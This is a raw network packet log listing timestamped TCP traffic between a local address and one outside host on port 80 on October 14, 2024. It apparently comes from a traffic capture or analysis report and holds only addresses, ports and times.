Oct 14, 2024 01:53:22.244352102 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.244703054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244714022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244725943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244736910 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244760990 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244761944 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.244772911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244785070 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244792938 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.244803905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244815111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244827032 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244827986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.244837999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244843960 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244849920 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244856119 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.244863033 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.244906902 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245003939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245049000 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245074987 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245086908 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245117903 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245143890 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245160103 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245170116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245181084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245203972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245223045 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245280981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245292902 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245302916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245307922 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245312929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245340109 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245351076 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245362043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245367050 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245397091 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245412111 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245424032 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245434999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245445967 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245460033 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245484114 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245558023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245569944 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245579958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245589972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245600939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245609999 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245620012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245635033 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245642900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245655060 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245660067 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245666981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245677948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245707035 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245712042 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245718002 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245729923 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245753050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245755911 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245765924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245775938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245784998 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245786905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245799065 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245829105 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245884895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245897055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245908022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245918036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245928049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245933056 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.245939016 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245951891 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245961905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.245965004 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246018887 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246025085 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246073961 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246117115 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246129036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246140003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246156931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246161938 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246170044 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246192932 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246217966 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246217966 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246232033 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246242046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246253014 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246263027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246263981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246274948 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246285915 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246295929 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246300936 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246341944 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246342897 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246355057 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246366024 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246376991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246386051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246388912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246403933 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246414900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246423006 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246426105 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.246459007 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.246475935 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.333884954 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.333981991 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.333992958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.333996058 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334003925 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334014893 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334026098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334033012 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334059000 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334095955 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334189892 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334202051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334212065 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334220886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334230900 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334240913 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334253073 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334270000 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334275007 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334286928 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334295988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334297895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334320068 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334321022 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334333897 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334342957 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334350109 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334355116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334366083 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334377050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334384918 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334386110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334410906 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334420919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334439993 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334446907 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334451914 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334462881 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334465981 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334475040 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334496021 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334531069 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334549904 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334561110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334569931 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334579945 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334589958 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334599972 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334599972 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334609985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334620953 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.334625006 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334652901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.334667921 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335124016 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335174084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335174084 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335185051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335217953 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335220098 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335230112 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335241079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335251093 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335264921 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335294008 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335342884 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335354090 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335362911 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335374117 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335396051 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335416079 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335417986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335427999 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335441113 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335450888 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335459948 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335489988 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335638046 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335659981 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335669994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335680962 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335711002 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335747004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335758924 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335767984 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335778952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335788012 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.335793018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335814953 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.335836887 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336146116 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336157084 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336167097 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336175919 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336186886 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336195946 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336196899 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336208105 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336216927 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336230993 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336255074 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336287975 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336298943 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336309910 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336332083 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336344004 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336361885 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336363077 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336379051 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336388111 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336390018 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336401939 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336419106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336447954 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336483002 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336493969 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336503983 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336513042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336523056 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336533070 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336534023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336551905 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336553097 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336563110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336580038 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336602926 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336632013 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336642027 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336652994 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336663008 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336673021 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336700916 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336704016 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336718082 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336729050 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336738110 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336740017 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336749077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336775064 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336796045 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336860895 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336872101 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336882114 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336891890 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336903095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336905956 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336914062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336925030 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336935043 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.336939096 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336961985 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.336977959 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337115049 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337126970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337137938 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337147951 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337158918 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337162018 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337183952 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337193966 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337198973 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337209940 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337220907 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337227106 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337232113 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337243080 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337251902 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337258101 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337276936 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337289095 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337290049 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337300062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337311029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337321997 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337326050 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337332010 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.337353945 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.337383986 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425278902 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425307989 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425318003 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425328970 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425364017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425374985 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425388098 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425391912 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425400019 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425458908 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425649881 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425661087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425672054 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425690889 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425708055 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425708055 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425719023 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425729036 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425734043 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425738096 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425750017 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425759077 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425769091 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425777912 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425785065 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425789118 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425800085 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425810099 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425816059 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425839901 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425851107 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425863028 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425872087 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425878048 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425888062 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425889015 CEST	49705	80	192.168.2.5	185.215.113.37
Oct 14, 2024 01:53:22.425899029 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425909042 CEST	80	49705	185.215.113.37	192.168.2.5
Oct 14, 2024 01:53:22.425918102 CEST	80	49705	185.215.113.37	192.168.2.5
